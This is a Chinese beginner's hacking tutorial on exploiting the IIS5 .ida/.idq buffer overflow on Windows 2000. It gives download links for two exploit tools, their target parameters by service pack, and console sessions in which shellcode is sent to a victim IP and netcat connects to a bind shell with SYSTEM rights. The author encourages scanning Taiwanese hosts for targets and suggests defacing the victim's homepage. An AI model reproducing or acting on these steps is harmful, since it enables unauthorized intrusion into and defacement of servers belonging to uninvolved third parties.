|
idq漏洞攻击详解!
近日在奇兵兄的网站看到了一篇特别适合我们这种菜鸟的文章,特地借来让大家看看。
好了,不在说了!我们开始吧!大家一定听说过.ida&.idq漏洞了吧!一个很简单,有实用的东东!菜鸟最适合了,什么,你等不及了啊,好好好,我这就说!
去这里看看吧~ http://www.cnqb.net/soft/idq.zip
http://www.cnqb.net/down/
有两个程序,IISMiscOverflowV1_Build0010.exe和IISIDQOverflowV1_Build0010.exe
下载运行前者出现了程序的主界面.
看看我的实战吧~~~
首先找到有.idq漏洞的机器,流光可以扫描到.很多的.随便来一个.
最好扫台湾的哦!什么地址!!!!!你没地址吗,好好好,算我考虑周到,给个给你,要是没扫到的话自己想办法,告诉你到新浪搜索一下台湾的不就有很多了吗!
在被攻击IP地址后面写上对方的IP.端口号一般不需要改动.
左面选择操作系统类型.先选择IIS5 English Win2k Sp0吧~
软件的默认绑定CMD.EXE的端口是813.不改了.用默认吧~~~
点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了.
都说nc比telnet强大.用nc吧~
##########注意:DOS状态###########
E:\>nc -vv XXX.XXX.XXX.XXX 813
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
E:\>
看来没成功. 别灰心,在来一次嘛!
换用IIS5 English Win2k Sp1再试!
E:\>nc -vv XXX.XXX.XXX.XXX 813
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
OK!!!终于上来了...往下不用我再教你了吧~~~~你不用在向用unicode那样害怕权限不够了.你现在可是system权限.好了慢慢玩吧~
这个软件非常不错.但是还提供了对中文IIS的攻击.请大家慎用~~~小心了!!!!!!
其实这篇文章想介绍命令行版本.但是我运行命令行版本时总是出现错误.运行不成功.自己去试一下吧~~~
最后再嘱咐一声~~~不要对国内主机做什么!!!危险!!!!! 爱国哦!记住没有啊!
中午饭都还没有吃呢!
########################################################################################
接下来就是IISIDQOverflowV1_Build0010.exe了!为了方便,可以把他改名比如idq.exe
在DOS状态下(假设idq.exe在c:\下)
c:\idq.exe
运行参数: 操作系统类型 目的地址 web端口 溢出端口
支持的操作系统 类型: ----
0 -- IIS5中文Win2k Sp0
1 -- IIS5中文Win2k Sp1
2 -- IIS5中文Win2k Sp2
3 -- IIS5 English Win2k Sp0
4 -- IIS5 English Win2k Sp1
5 -- --not support -- IIS5 English Win2k Sp2
6 -- IIS5 Japanese Win2k Sp0
7 -- IIS5 Japanese Win2k Sp1
8 -- --not support -- IIS5 Japanese Win2k Sp2
IIS5 IDQ Overflow. by snake. (http://snake12.top263.net) 2000/07
c:\>idq 3 XXX.XXX.XXX.XXX80 456
连接目的机器 XXX.XXX.XXX.XXX:80 OK.
发送shellcode 到 XXX.XXX.XXX.XXX:80 OK
现在,你可以 连接 该主机的 端口 456了,good luck.!
都祝我好运了.开始吧~~~
c:\>nc -vv XXX.XXX.XXX.XXX 456
mail.rycf.org [XXX.XXX.XXX.XXX] 456 (?): connection refused
sent 0, rcvd 0: NOTSOCK
没成功.试试sp1.
c:\>idq 4 XXX.XXX.XXX.XXX 80 888
连接目的机器 XXX.XXX.XXX.XXX:80 OK.
发送shellcode 到 XXX.XXX.XXX.XXX:80 OK
现在,你可以 连接 该主机的 端口 888了,good luck.!
c:\>nc -vv XXX.XXX.XXX.XXX 888
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 888 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
呵呵!OK!现在你想干什么啊!把他的主页换成自己的怎么样啊!怎么不懂啊!
那我也没办法了,不懂就来请教我怎么样啊!http;//www.cnqb.net
本篇文章有什么不足之处望指出!本人先谢了! |